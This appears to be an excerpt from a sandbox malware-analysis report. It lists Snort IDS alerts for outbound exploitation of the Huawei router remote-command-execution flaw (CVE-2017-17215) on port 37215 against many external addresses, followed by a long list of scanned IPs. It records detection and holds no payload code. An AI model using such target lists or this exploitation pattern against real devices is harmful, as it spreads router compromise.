          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39440 -> 41.75.44.92:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39440 -> 41.75.44.92:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54316 -> 197.80.43.242:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54316 -> 197.80.43.242:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34962 -> 40.13.193.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34962 -> 40.13.193.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37494 -> 121.184.225.209:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37494 -> 121.184.225.209:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50934 -> 41.39.214.40:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50934 -> 41.39.214.40:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43112 -> 41.65.151.45:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43112 -> 41.65.151.45:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44358 -> 157.232.198.122:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44358 -> 157.232.198.122:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54734 -> 157.81.63.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54734 -> 157.81.63.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52844 -> 157.205.66.223:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52844 -> 157.205.66.223:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57070 -> 41.132.188.132:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57070 -> 41.132.188.132:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41968 -> 41.38.103.88:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41968 -> 41.38.103.88:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48642 -> 41.236.127.99:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48642 -> 41.236.127.99:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34768 -> 62.156.201.132:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34768 -> 62.156.201.132:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37562 -> 41.4.20.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37562 -> 41.4.20.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48922 -> 197.46.196.145:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48922 -> 197.46.196.145:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39156 -> 194.42.64.159:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39156 -> 194.42.64.159:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57416 -> 170.217.222.105:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57416 -> 170.217.222.105:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33846 -> 157.70.135.189:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33846 -> 157.70.135.189:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36440 -> 157.161.17.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36440 -> 157.161.17.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52176 -> 202.53.163.228:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52176 -> 202.53.163.228:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60532 -> 96.16.251.87:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60532 -> 96.16.251.87:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56900 -> 197.35.89.234:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56900 -> 197.35.89.234:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46838 -> 41.36.124.77:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46838 -> 41.36.124.77:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42698 -> 111.56.6.70:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42698 -> 111.56.6.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37498 -> 41.61.78.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37498 -> 41.61.78.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36374 -> 104.28.93.246:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36374 -> 104.28.93.246:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40906 -> 41.22.202.77:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40906 -> 41.22.202.77:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52106 -> 72.241.122.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52106 -> 72.241.122.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43206 -> 41.59.14.39:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43206 -> 41.59.14.39:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45982 -> 41.77.26.136:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45982 -> 41.77.26.136:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42948 -> 62.45.133.211:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42948 -> 62.45.133.211:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47176 -> 157.155.97.158:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47176 -> 157.155.97.158:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53130 -> 91.34.171.68:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53130 -> 91.34.171.68:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43604 -> 157.129.182.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43604 -> 157.129.182.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50776 -> 41.83.55.9:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50776 -> 41.83.55.9:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53138 -> 181.223.252.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53138 -> 181.223.252.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45866 -> 175.27.181.201:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45866 -> 175.27.181.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46990 -> 73.232.93.161:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46990 -> 73.232.93.161:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50446 -> 197.126.148.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50446 -> 197.126.148.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46762 -> 157.10.183.224:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46762 -> 157.10.183.224:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55640 -> 86.164.76.82:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55640 -> 86.164.76.82:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48768 -> 157.66.7.235:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48768 -> 157.66.7.235:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56388 -> 78.155.28.203:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56388 -> 78.155.28.203:37215
          Source: global trafficTCP traffic: 41.81.111.49 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.115.50.219 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.218.51.35 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.106.179.186 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.49.130.42 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.181.187.63 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 32.70.63.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.120.87.27 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.248.99.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.207.19.143 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.40.31.212 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.177.177.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.36.124.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 171.136.159.162 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.240.58.215 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.184.154.236 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.96.244.135 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.71.234.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.59.14.39 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 99.118.121.186 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 146.88.125.241 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.94.49.42 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.244.138.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.61.22.189 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.93.99.43 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 200.50.0.128 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.155.18.75 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.150.35.57 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.209.84.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.170.16.169 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 167.149.120.201 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.207.227.84 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.187.189.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.190.250.111 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.71.75.62 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.34.55.174 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.64.55.104 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 165.13.117.149 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 202.205.99.51 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.122.224.246 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.228.94.5 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 178.46.68.67 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.189.87.89 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.89.45.112 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 119.193.17.67 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 160.125.198.200 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.237.254.184 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.156.60.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 83.157.255.128 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.156.76.148 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.203.50.211 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 25.220.131.205 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.62.61.160 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.183.120.242 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 212.202.86.247 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.32.92.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.132.171.90 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.24.242.60 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 148.234.42.141 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.28.220.199 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.189.47.147 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.232.198.122 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.67.91.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.136.43.189 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.178.255.181 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.107.66.109 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.169.250.138 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.240.74.192 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.252.168.58 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.140.211.208 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.114.133.41 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.38.103.88 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 124.52.233.176 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.45.42.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.205.154.173 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 162.62.122.215 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.136.6.25 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.180.220.79 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.225.15.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 49.18.130.18 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.28.58.166 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.170.92.181 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.215.33.201 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 145.100.163.6 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.147.158.73 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.219.26.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.184.29.239 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.167.80.112 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.229.70.67 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.243.45.68 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.146.41.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.235.85.137 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.132.188.132 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.210.67.244 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.69.192.244 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.216.152.98 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.126.47.40 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.109.35.237 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.248.110.158 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 181.223.252.93 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 35.199.196.60 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 119.96.193.143 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.111.63.44 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.55.0.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.137.214.31 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.161.17.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.209.250.31 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 47.29.97.69 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.246.134.104 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 73.232.93.161 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.6.201.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.66.49.77 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 12.122.16.153 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.75.44.92 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.113.179.236 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.37.212.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 194.42.64.159 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.148.142.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 62.156.201.132 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 73.13.32.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.255.96.255 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.208.197.110 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.196.105.206 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.126.181.1 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.4.108.230 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 202.53.163.228 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.188.59.131 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 156.102.160.253 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 161.209.166.90 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.157.26.182 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.208.124.53 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.207.113.155 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 220.32.134.65 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.152.183.159 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.210.134.33 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.59.1.14 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.226.16.114 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 45.76.153.230 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.205.66.223 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.193.222.248 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.202.22.32 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.15.244.27 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 134.159.69.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.94.125.45 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.94.0.238 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.218.112.215 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.33.252.41 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.212.41.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 206.165.1.248 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 19.107.252.52 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.13.3.206 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.157.42.156 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.32.140.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 162.189.159.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.238.192.8 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.86.115.10 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.9.102.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 98.190.70.179 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.192.243.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.119.137.226 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.163.208.236 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.80.123.155 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.247.83.123 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.248.51.107 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.77.26.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.209.164.19 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.104.189.21 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.68.115.61 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.46.110.84 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.173.85.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.129.182.59 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.197.76.176 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.86.95.214 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.205.200.216 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.192.167.156 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 173.241.30.192 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.234.255.89 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.1.15.214 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.199.221.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.7.242.44 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 185.235.202.184 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.213.7.117 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.55.193.145 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 148.173.73.182 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.41.240.18 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.151.76.136 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 212.214.148.212 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.70.135.189 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.140.202.101 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.220.218.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.108.181.127 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.233.70.153 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.156.52.33 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.232.90.3 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.179.251.16 ports 1,2,3,5,7,37215
